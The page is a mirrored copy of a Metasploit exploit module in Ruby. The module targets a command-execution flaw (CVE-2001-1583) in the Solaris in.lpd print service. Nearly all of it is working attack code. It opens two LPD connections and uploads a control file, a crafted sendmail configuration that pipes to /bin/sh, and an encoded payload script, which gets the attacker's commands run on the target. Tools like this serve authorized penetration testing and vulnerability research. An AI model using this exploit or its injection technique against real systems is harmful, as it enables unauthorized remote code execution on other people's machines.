CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/solaris/lpd/sendmail_exec.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Solaris LPD Command Execution',

14
      'Description'    => %q{

15
          This module exploits an arbitrary command execution flaw in

16
        the in.lpd service shipped with all versions of Sun Solaris

17
        up to and including 8.0. This module uses a technique

18
        discovered by Dino Dai Zovi to exploit the flaw without

19
        needing to know the resolved name of the attacking system.

20
      },

21
      'Author'         => [ 'hdm', 'ddz' ],

22
      'License'        => MSF_LICENSE,

23
      'References'     =>

24
        [

25
          [ 'CVE', '2001-1583'],

26
          [ 'OSVDB', '15131'],

27
          [ 'BID', '3274'],

28
        ],

29
      'Platform'       => %w{ solaris unix },

30
      'Arch'           => ARCH_CMD,

31
      'Payload'        =>

32
        {

33
          'Space'       => 8192,

34
          'DisableNops' => true,

35
          'Compat'      =>

36
            {

37
              'PayloadType' => 'cmd',

38
              'RequiredCmd' => 'generic perl telnet',

39
            }

40
        },

41
      'Targets'        =>

42
        [

43
          [ 'Automatic Target', { }]

44
        ],

45
      'DisclosureDate' => '2001-08-31',

46
      'DefaultTarget' => 0))

47


48
    register_options(

49
      [

50
        Opt::RPORT(515)

51
      ])

52
  end

53


54
  def exploit

55


56
    # This is the temporary path created in the spool directory

57
    spath = "/var/spool/print"

58


59
    # The job ID is squashed down to three decimal digits

60
    jid   = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]

61


62
    # The control file

63
    control =

64
      "H"+"metasploit\n"+

65
      "P"+"\\\"-C"+spath+"/"+jid+"mail.cf\\\" nobody\n"+

66
      "f"+"dfA"+jid+"config\n"+

67
      "f"+"dfA"+jid+"script\n"

68


69


70
    # The mail configuration file

71
    mailcf =

72
      "V8\n"+

73
      "\n"+

74
      "Ou0\n"+

75
      "Og0\n"+

76
      "OL0\n"+

77
      "Oeq\n"+

78
      "OQX/tmp\n"+

79
      "\n"+

80
      "FX|/bin/sh #{spath}/#{jid}script\n"+

81
      "\n"+

82
      "S3\n"+

83
      "S0\n"+

84
      "R\+     #local \\@blah :blah\n"+

85
      "S1\n"+

86
      "S2\n"+

87
      "S4\n"+

88
      "S5\n"+

89
      "\n"+

90
      "Mlocal  P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"+

91
      "Mprog   P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"

92


93
    # Establish the first connection to the server

94
    sock1 = connect(false)

95


96
    # Request a cascaded job

97
    sock1.put("\x02metasploit:framework\n")

98
    res = sock1.get_once

99
    if (not res)

100
      print_status("The target did not accept our job request command")

101
      return

102
    end

103


104
    print_status("Configuring the spool directory...")

105
    if !(

106
        send_file(sock1, 2, "cfA" + jid + "metasploit", control) and

107
        send_file(sock1, 3, jid + "mail.cf", mailcf) and

108
        send_file(sock1, 3, jid + "script", payload.encoded)

109
      )

110
      sock1.close

111
      return

112
    end

113


114
    # Establish the second connection to the server

115
    sock2 = connect(false)

116


117
    # Request another cascaded job

118
    sock2.put("\x02localhost:metasploit\n")

119
    res = sock2.get_once

120
    if (not res)

121
      print_status("The target did not accept our second job request command")

122
      return

123
    end

124


125
    print_status("Attempting to trigger the vulnerable call to the mail program...")

126
    if !(

127
        send_file(sock2, 2, "cfA" + jid + "metasploit", control) and

128
        send_file(sock2, 3, "dfa" + jid + "config", mailcf)

129
      )

130
      sock1.close

131
      sock2.close

132
      return

133
    end

134


135
    sock1.close

136
    sock2.close

137


138
    print_status("Waiting up to 60 seconds for the payload to execute...")

139
    select(nil,nil,nil,60)

140


141
    handler

142
  end

143


144
  def send_file(s, type, name, data='')

145


146
    s.put(type.chr + data.length.to_s + " " + name + "\n")

147
    res = s.get_once(1)

148
    if !(res and res[0,1] == "\x00")

149
      print_status("The target did not accept our control file command (#{name})")

150
      return

151
    end

152


153
    s.put(data)

154
    s.put("\x00")

155
    res = s.get_once(1)

156
    if !(res and res[0,1] == "\x00")

157
      print_status("The target did not accept our control file data (#{name})")

158
      return

159
    end

160


161
    print_status(sprintf("     Uploaded %.4d bytes >> #{name}", data.length))

162
    return true

163
  end

164
end

165


166